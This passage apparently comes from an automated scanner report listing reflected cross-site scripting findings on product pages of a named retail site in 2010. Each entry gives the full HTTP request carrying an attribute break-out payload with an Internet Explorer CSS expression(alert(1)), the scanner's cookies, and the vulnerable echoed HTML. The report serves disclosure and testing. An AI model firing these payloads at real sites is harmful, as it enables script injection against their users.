User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:19 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:19 GMT; Path=/
Set-Cookie: mxcproclicks=5042811|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:19 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405059596:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=14
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Fi
...[SNIP]...
<input type="hidden" name="b9101"style="x:expression(alert(1))"646300c3d51" value="1"/>
...[SNIP]...

2.5. http://www.overstock.com/Baby/Safety-1st-Alpha-Omega-Elite-Convertible-Car-Seat-in-Triton/3514162/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Safety-1st-Alpha-Omega-Elite-Convertible-Car-Seat-in-Triton/3514162/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 197a6"style%3d"x%3aexpression(alert(1))"7f8de40b4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 197a6"style="x:expression(alert(1))"7f8de40b4e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (the request was sent with an MSIE 7.0 User-Agent) and may not work on other browsers; the underlying attribute break-out, a literal " closing the name attribute, is not browser-specific, so an event-handler attribute would serve in other browsers.

Request

GET /Baby/Safety-1st-Alpha-Omega-Elite-Convertible-Car-Seat-in-Triton/3514162/product.html?197a6"style%3d"x%3aexpression(alert(1))"7f8de40b4e8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:09 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:09 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405049241:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3514162|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:09 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:09 GMT; Path=/
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111108

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Sa
...[SNIP]...
<input type="hidden" name="197a6"style="x:expression(alert(1))"7f8de40b4e8" value="1"/>
...[SNIP]...

2.6. http://www.overstock.com/Clothing-Shoes/Adi-Designs-Womens-Lug-Sole-Microsuede-Boots/4034996/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Adi-Designs-Womens-Lug-Sole-Microsuede-Boots/4034996/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c86e7"style%3d"x%3aexpression(alert(1))"459158a778c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c86e7"style="x:expression(alert(1))"459158a778c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (the request was sent with an MSIE 7.0 User-Agent) and may not work on other browsers; the underlying attribute break-out, a literal " closing the name attribute, is not browser-specific, so an event-handler attribute would serve in other browsers.

Request

GET /Clothing-Shoes/Adi-Designs-Womens-Lug-Sole-Microsuede-Boots/4034996/product.html?c86e7"style%3d"x%3aexpression(alert(1))"459158a778c=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:53:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:53:01 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:53:01 GMT; Path=/
Set-Cookie: mxcproclicks=4034996|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:53:01 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404381352:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=63
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 119147

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ad
...[SNIP]...
<input type="hidden" name="c86e7"style="x:expression(alert(1))"459158a778c" value="1"/>
...[SNIP]...

2.7. http://www.overstock.com/Clothing-Shoes/Adi-Designs-Womens-Microsuede-Mid-calf-Boots/2691136/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Adi-Designs-Womens-Microsuede-Mid-calf-Boots/2691136/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a597d"style%3d"x%3aexpression(alert(1))"e7efc54d74e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a597d"style="x:expression(alert(1))"e7efc54d74e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (the request was sent with an MSIE 7.0 User-Agent) and may not work on other browsers; the underlying attribute break-out, a literal " closing the name attribute, is not browser-specific, so an event-handler attribute would serve in other browsers.

Request

GET /Clothing-Shoes/Adi-Designs-Womens-Microsuede-Mid-calf-Boots/2691136/product.html?a597d"style%3d"x%3aexpression(alert(1))"e7efc54d74e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:58:00 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:58:00 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408280748:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:00 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=2691136|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:58:00 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=69
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 126217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Ad
...[SNIP]...
<input type="hidden" name="a597d"style="x:expression(alert(1))"e7efc54d74e" value="1"/>
...[SNIP]...

2.8. http://www.overstock.com/Clothing-Shoes/Alta-Vison-Mens-Goldtone-Aviator-Sunglasses/5016847/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Alta-Vison-Mens-Goldtone-Aviator-Sunglasses/5016847/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1be1a"style%3d"x%3aexpression(alert(1))"d9cf0caab8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1be1a"style="x:expression(alert(1))"d9cf0caab8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Alta-Vison-Mens-Goldtone-Aviator-Sunglasses/5016847/product.html?1be1a"style%3d"x%3aexpression(alert(1))"d9cf0caab8a=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:59:36 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:59:36 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:36 GMT; Path=/
Set-Cookie: mxcproclicks=5016847|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:59:36 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404776530:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 102314

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Al
...[SNIP]...
<input type="hidden" name="1be1a"style="x:expression(alert(1))"d9cf0caab8a" value="1"/>
...[SNIP]...

2.9. http://www.overstock.com/Clothing-Shoes/America-Best-Womens-Fleece-Lined-Leather-Gloves/5301336/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/America-Best-Womens-Fleece-Lined-Leather-Gloves/5301336/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e4d"style%3d"x%3aexpression(alert(1))"85f611973fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2e4d"style="x:expression(alert(1))"85f611973fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/America-Best-Womens-Fleece-Lined-Leather-Gloves/5301336/product.html?d2e4d"style%3d"x%3aexpression(alert(1))"85f611973fd=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:21 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:21 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=5301336|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:21 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404941652:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:21 GMT; Path=/
Keep-Alive: timeout=5, max=31
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108872

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="d2e4d"style="x:expression(alert(1))"85f611973fd" value="1"/>
...[SNIP]...

2.10. http://www.overstock.com/Clothing-Shoes/Amerileather-Casual-Leather-Handbag/29943/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Casual-Leather-Handbag/29943/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 688e1"style%3d"x%3aexpression(alert(1))"782a1c744b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 688e1"style="x:expression(alert(1))"782a1c744b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Amerileather-Casual-Leather-Handbag/29943/product.html?688e1"style%3d"x%3aexpression(alert(1))"782a1c744b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:18 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:18 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408178718:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:18 GMT; Path=/
Set-Cookie: mxcproclicks=29943|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:18 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=65
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Am
...[SNIP]...
<input type="hidden" name="688e1"style="x:expression(alert(1))"782a1c744b" value="1"/>
...[SNIP]...

2.11. http://www.overstock.com/Clothing-Shoes/Amerileather-Cosmopolitan-Leather-Tote-Bag/512067/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Amerileather-Cosmopolitan-Leather-Tote-Bag/512067/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2260e"style%3d"x%3aexpression(alert(1))"96ee5398979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2260e"style="x:expression(alert(1))"96ee5398979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /Clothing-Shoes/Amerileather-Cosmopolitan-Leather-Tote-Bag/512067/product.html?2260e"style%3d"x%3aexpression(alert(1))"96ee5398979=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:35 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:35 GMT
Pragma: no-cache
